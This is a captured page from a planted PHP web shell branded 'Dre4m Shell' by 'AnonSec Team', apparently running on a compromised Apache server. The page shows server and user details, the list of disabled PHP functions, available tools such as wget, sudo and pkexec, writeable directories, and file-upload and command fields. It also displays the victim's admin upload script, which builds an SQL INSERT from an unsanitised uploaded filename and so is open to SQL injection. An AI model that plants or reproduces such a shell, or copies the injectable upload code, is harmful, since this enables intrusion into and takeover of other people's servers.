Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.216.95.250
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /var/www/html/admin/training-catalog-action.php
<?php

session_start();

require_once('include/db-config.php');

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // $targetDir = "/var/www/html/maintenancetraining/maintenancetraining_laravel/admin/images/";  // Directory to store uploaded files
    $rootPath = dirname(__DIR__);
    $target_dir = $rootPath . "/admin/images/";
     // Relative path from the current directory to the images directory
    $targetFile = $target_dir . basename($_FILES["pdfFile"]["name"]);
    // $targetFileName = $targetDir . basename($_FILES["pdfFile"]["name"]);
    // $targetFileName ="images/" . $_FILES["pdfFile"]['name'];

    
    $uploadOk = 1;
    $pdfFileType = strtolower(pathinfo($targetFile, PATHINFO_EXTENSION));

    // Check if the uploaded file is a PDF
    if ($pdfFileType != "pdf") {
        // echo "Only PDF files are allowed.";
        $_SESSION['upload_message'] = "Only PDF files are allowed.";
        $uploadOk = 0;
    }

    // Check if the file already exists
    // if (file_exists($targetFile)) {
    //     echo "File already exists.";
    //     $uploadOk = 0;
    // }

    // Upload the file
    if ($uploadOk == 1) {

        if (move_uploaded_file($_FILES["pdfFile"]["tmp_name"], $targetFile)) {
            // echo "The file " . basename($_FILES["pdfFile"]["name"]) . " has been uploaded.";
            $targetFileName = $_FILES["pdfFile"]['name'];
            $_SESSION['upload_message'] = "File uploaded successfully.";

            $sqladddata = "INSERT INTO `training_catalog` (`filename`) VALUES ('$targetFileName')";
            $result2 = mysqli_query($conn, $sqladddata) or die(mysqli_error($conn));
        } else {
                        $_SESSION['upload_message'] = "Error uploading the file.";
// var_dump(error_get_last());
        }
        header("Location: training-catalog.php"); // Redirect back to upload_form.php
        exit();
    }
} else {
    // Handle invalid request
}

?>

Anon7 - 2022
AnonSec Team